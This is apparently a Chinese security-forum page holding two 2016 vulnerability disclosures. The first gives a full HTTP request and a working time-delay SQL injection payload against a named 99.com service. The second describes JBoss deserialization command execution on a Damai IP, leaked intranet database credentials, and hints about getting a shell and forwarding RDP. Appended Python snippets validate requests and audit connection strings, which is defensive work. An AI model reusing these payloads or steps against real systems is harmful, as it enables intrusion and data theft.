HanDs
Administrator


While learning, abide by the relevant national laws and regulations; hackers do no evil. Without network security there is no national security.

This site requires login to view.

Details:

Target: syjf.data.99.com

Testing found SQL injection at the following location (platformName/productName in the POST body, stacked query):

Code area:
POST /MobileGameReporting/Services/MobileGameServices.asmx/GetChannelCodeByProductId HTTP/1.1
Origin: http://syjf.data.99.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
DNT: 1
Content-Type: application/json
Content-Length: 65
Referer: http://syjf.data.99.com/MobileGameReporting/Services/MobileGameServices.asmx/GetChannelCodeByProductId
Cookie: ASP.NET_SessionId=u0h0qo55ifdaks45c4om1g45
Host: syjf.data.99.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

{"platformName":"","productName":"106599"}



Payload: (5-second delay)

Code area:
"productName":"106599; waitfor delay '0:0:5' -- -"

Proof of vulnerability:

1. Current database user

(screenshot: user.jpg)

2. All databases

(screenshot: dbs.jpg)

3. Data tables; I did not go any deeper.

(screenshot: tb.jpg)

Remediation:

Please advise~


While learning, abide by laws and regulations; all content on this site comes from the internet, and this site bears no legal responsibility.
2016-7-14 #1
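A defender-side check for the request in the report above, added here as an example that is not part of the original post: it validates the JSON body sent to GetChannelCodeByProductId against a strict per-field allow-list and flags the stacked-query and time-delay indicators present in the reported payload. The allow-list rules (productName is a numeric id, platformName a short token) and the sample bodies other than the two from the report are assumptions; parameterized queries in the service handler remain the actual fix, and this check only complements them.

```python
import json
import re

# Constructed sample bodies for GetChannelCodeByProductId. The first two are the
# benign request and the time-delay payload from the report; the rest are made up.
SAMPLE_BODIES = [
    '{"platformName":"","productName":"106599"}',
    '{"platformName":"","productName":"106599; waitfor delay \'0:0:5\' -- -"}',
    '{"platformName":"ios\'; select 1 --","productName":"106599"}',
    '{"platformName":"android","productName":"12abc"}',
]

# Assumed allow-list: productName is a numeric id, platformName a short token.
FIELD_RULES = {
    "productName": re.compile(r"^\d{1,10}$"),
    "platformName": re.compile(r"^[A-Za-z0-9_-]{0,32}$"),
}

# Indicators of stacked / time-based SQL Server injection, as in the report's payload.
INJECTION_PATTERNS = [
    ("stacked_query", re.compile(r";\s*\w")),
    ("time_delay", re.compile(r"waitfor\s+delay|sleep\s*\(", re.I)),
    ("comment_tail", re.compile(r"--|/\*")),
    ("quote_break", re.compile(r"'")),
]


def inspect_body(raw):
    """Validate one JSON body; return {"ok": bool, "findings": [(field, kind), ...]}."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return {"ok": False, "findings": [("body", "invalid_json")]}
    findings = []
    for field, rule in FIELD_RULES.items():
        value = data.get(field, "")
        if not isinstance(value, str):
            findings.append((field, "wrong_type"))
            continue
        # Report both the allow-list failure and the specific indicators, so a
        # rejected request still tells the analyst what it looked like.
        if not rule.fullmatch(value):
            findings.append((field, "allowlist_mismatch"))
        for kind, pattern in INJECTION_PATTERNS:
            if pattern.search(value):
                findings.append((field, kind))
    return {"ok": not findings, "findings": findings}


def triage(bodies):
    """Return the indices of bodies that should be blocked and logged."""
    return [i for i, body in enumerate(bodies) if not inspect_body(body)["ok"]]
```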
HanDs
Administrator

[July vulnerability disclosure] A Java deserialization command execution on 大麦网 (Damai) / can probe the intranet / involves configuration information for multiple intranet databases






Java deserialization

Details:

http://122.113.39.236:8090/



JBoss Java deserialization

(screenshot: 111.png)





Lots of intranet database connection information:








(screenshot: 111.png)





Still the intranet: net view




(screenshot: 111.png)





SYSTEM privileges; one could find a directory to get a shell and then forward 3389 out.

Proof of vulnerability:

(screenshot: 111.png)

Remediation:

JBoss Java deserialization


#2
Posted: 2016-7-14 | Views: 0 | Replies: 0
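The masked connection strings in the report above show what a configuration file on such a host typically leaks: SQL Server data sources with plaintext passwords. As an added defender's example (not code from the report or from the site concerned), the Python below audits a constructed .NET connectionStrings fragment, reports host, database and user per entry, and lists the entries that carry a plaintext password without ever emitting the secret itself; the hosts, names and passwords are all made up.

```python
import re

# Constructed .NET connectionStrings fragment, modelled on the shape of the
# masked strings in the report. Hosts, names and passwords are invented.
SAMPLE_CONFIG = """
<connectionStrings>
  <add name="TicketDb" connectionString="data source=10.0.0.5\\SQL2008,14330;persist security info=False;initial catalog=ticket;user id=ticket_user;password=ticket_pwd;"/>
  <add name="ReadOnly" connectionString="data source=10.0.0.5\\READONLY,1433;Integrated Security=SSPI;initial catalog=report;"/>
  <add name="Notify" connectionString="Server=10.0.0.12;Database=notify;Uid=notify;Pwd=notify_pwd"/>
</connectionStrings>
"""

# Keys that carry a secret, and keys that name the account (SQL Server / ODBC spellings).
SECRET_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid", "user")
ENTRY_RE = re.compile(r'name="([^"]+)"\s+connectionString="([^"]*)"')


def parse_connection_string(cs):
    """Split 'k=v;k=v' into a dict with lower-cased keys; values keep their case."""
    pairs = {}
    for part in cs.split(";"):
        if "=" not in part:
            continue
        key, _, value = part.partition("=")
        pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_config(xml_text):
    """Return one finding per <add> entry. Secrets are never copied into the result."""
    findings = []
    for name, cs in ENTRY_RE.findall(xml_text):
        kv = parse_connection_string(cs)
        findings.append({
            "name": name,
            "host": kv.get("data source") or kv.get("server") or "?",
            "database": kv.get("initial catalog") or kv.get("database") or "?",
            "user": next((kv[k] for k in USER_KEYS if k in kv), None),
            # Integrated security entries carry no credential; these do.
            "plaintext_password": any(k in kv for k in SECRET_KEYS),
        })
    return findings


def entries_with_plaintext_passwords(xml_text):
    """Names of entries that embed a password and therefore need rotation and a vault."""
    return [f["name"] for f in audit_config(xml_text) if f["plaintext_password"]]
```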